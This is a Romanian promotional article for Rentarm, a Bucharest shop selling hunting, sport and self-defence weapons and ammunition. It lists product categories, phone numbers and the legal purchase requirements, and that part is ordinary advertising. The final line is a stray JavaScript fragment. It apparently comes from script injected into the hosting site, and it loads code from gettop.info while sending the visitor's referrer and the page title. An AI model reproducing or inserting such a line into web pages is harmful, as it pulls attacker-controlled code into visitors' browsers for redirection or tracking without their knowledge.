Rentarm, magazin arme in Bucuresti

Vrei sa-ti cumperi arme pentru autoaparare cum sunt spray-urile paralizante sau cele cu piper? Ai nevoie de munitie pentru armele tale de tir sau pentru cele de paza si protectie? Tot ce ai de facut este sa accesezi magazin arme din Bucuresti, Rentarm, un magazin online dotat cu tot ce ai nevoie si, mai ales, cu preturi excelente.

Magazin arme in varianta online

 

Rentarm, magazin arme in BucurestiNu este vorba numai despre comoditate si confort, ci si despre lipsa timpului de a colinda magazinele pentru a-ti alege produsele potrivite. In acest sens, in ajutorul tau vin magazinele online. Astazi, in 2015, poti cumpara orice online, de la haine si pana la alimente, produse de protocol sau munitie.

Exista si magazin arme online? Cu siguranta, si este vorba despre Rentarm din Bucuresti, compania luand nastere in anul 2008. Ce-ti propune acest magazin arme? Cumpararea de arme si munitii, inchirierea armelor, importul si exportul de arme, dar si depozitarea de arme, cat si de munitii neletale si munitii letale in siguranta deplina, in functie de nevoile si cerintele fiecarui client in parte.

Si pentru ca Rentarm isi doreste sa-ti ofere servicii si produse de cea mai buna calitate, poti fi sigur de confidentialitatea intregului personal Rentarm, astfel ca tot ceea ce tine de nume, adresa si documente sunt strict secrete.

Cum poti comanda si tu arme si munitii din acest magazin arme online? Foarte simplu! Tot ce ai de facut este sa accesezi pagina rentarm.ro, sa vizitezi magazinul online, sa studiezi oferta generoasa pe care Rentarm ti-a pregatit-o, dupa care poti adauga fiecare produs in cosul de cumparaturi si apoi le poti ridica direct din magazin.

Toata lumea poate cumpara arme si munitii de la Rentarm? Fii fara grija, trebuie sa indeplinesti cateva conditii de baza precum:

1. Trebuie sa ai minim 18 ani;

2. Sa detii o autorizatie de cumparare pe care ai obtinut-o de la Politie, de la Serviciul de arme situat in raza domiciliului tau;

3. Sa te prezinti la magazin cu documentele necesare pentru a putea ridica produsele.

Bine, bine, te vei intreba, atunci la ce-mi foloseste un magazin online daca trebuie sa ma prezint personal la magazin pentru ridicarea produselor? Trebuie sa intelegi ca este vorba despre anumite articole ce se afla sub incidenta Legii 295/2004 din Romania cu privire la arme si munitii, iar masurile de precautie sunt necesare. In acest caz, magazinul online te ajuta sa vezi rapid produsele, sa le studiezi caracteristicile si sa le rezervi, doar cu cateva click-uri.

Top 6 categorii de produse pe care le gasesti intr-un magazin arme

 

Ce fel de produse pot cumpara din magazin arme Rentarm din Bucuresti? Este vorba despre cateva categorii aparte:

1. Arme pentru vanatoare: arme cu alice, arme cu glont, arme mixte si diferite accesorii;Rentarm, magazin arme in Bucuresti1

2. Arme pentru paza si protectie: pistoale cu glont;

3. Arme pentru autoaparare, arme neletale cum sunt spray-urile sau pistoalele cu jet de piper;

4. Arme pentru tir: pusti, pistoale si munitie;

5. Munitie pentru toate categoriile mai sus mentionate;

6. Diferite accesorii printre care se numara imbracamintea si incaltamintea specifica.

Daca vrei sa te bucuri de calitate, alege Rentarm, magazin arme. Ai nevoie de informatii suplimentare despre magazinul si produsele Rentarm? Pentru detalii si comenzi, suna la numarul 0721-201.933 sau 0212-220.393.

Articol oferit de zoom-biz.ro.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;